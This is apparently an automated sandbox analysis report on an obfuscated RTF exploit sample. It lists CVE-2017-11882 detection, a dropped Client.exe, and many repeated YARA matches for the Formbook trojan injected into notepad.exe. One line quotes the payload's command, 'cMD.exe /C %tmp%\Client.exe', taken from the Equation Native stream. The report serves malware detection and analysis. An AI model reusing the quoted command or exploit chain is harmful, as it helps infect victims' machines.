          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp, type: DROPPEDMatched rule: EXP_potential_CVE_2017_11882 Author: ReversingLabs
          Document contains OLE streams with names of living off the land binaries
          Source: ~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp.0.drStream path '_1721489049/Equation Native' : ...............\.[.............ZZCmD.exe /C %tmp%\Client.exe A..C................................................................................................................
          PE file contains section with special chars
          Source: Client.exe.0.drStatic PE information: section name: 5++.8$
          Office process drops PE file
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\Client.exeJump to dropped file
          PE file has nameless sections
          Source: Client.exe.0.drStatic PE information: section name:
          Found suspicious RTF objects
          Source: Client.exeStatic RTF information: Object: 0 Offset: 000012A7h Client.exe
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_00321338
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_003236C0
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_00324B61
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_00322078
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_0032A100
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_00324B70
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_00329BD8
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_004A7928
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_0087BA28
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_00870AAB
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_00870048
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_00878478
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_0087B188
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_0087B508
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_0087B348
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_02400048
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00401030
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041E0B9
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00402D87
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00402D90
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00409E60
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041EE1B
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041D688
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00402FB0
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AAE0C6
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00ADD005
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B2D06D
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AB3040
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AC905A
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AAE2E9
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B51238
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B563BF
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AAF3CF
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AD63DB
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AB2305
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AFA37B
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AB7353
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AC1489
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AE5485
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B3443E
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AED47D
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B305E3
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00ACC5F0
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AB351F
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AF6540
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AB4680
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00ABE6C1
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B52622
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AFA634
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00ABC7BC
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B3579A
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AE57C3
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B4F8EE
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B2F8C4
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AD286D
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00ABC85C
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AB29B2
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B5098E
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AC69FE
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B35955
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B3394B
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B63A83
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B5CBA4
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B3DBDA
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AD7B00
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B4FDDD
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AE0D3B
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00ABCD5B
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AE2E2F
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00ACEE4C
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B4CFB1
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B22FDC
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AC0F3F
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00ADDF7C
          Source: ~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Users\user\AppData\Local\Temp\Client.exeSection loaded: amsi.dll
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and write
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory allocated: 77620000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory allocated: 77740000 page execute and read and write
          Source: C:\Windows\SysWOW64\notepad.exeMemory allocated: 77620000 page execute and read and write
          Source: C:\Windows\SysWOW64\notepad.exeMemory allocated: 77740000 page execute and read and write
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf, type: SAMPLEMatched rule: MAL_RTF_Embedded_OLE_PE date = 2018-01-22, author = Florian Roth, description = Detects a suspicious string often used in PE files in a hex encoded object stream, reference = https://www.nextron-systems.com/2018/01/22/creating-yara-rules-detect-embedded-exe-files-ole-objects/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
          Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
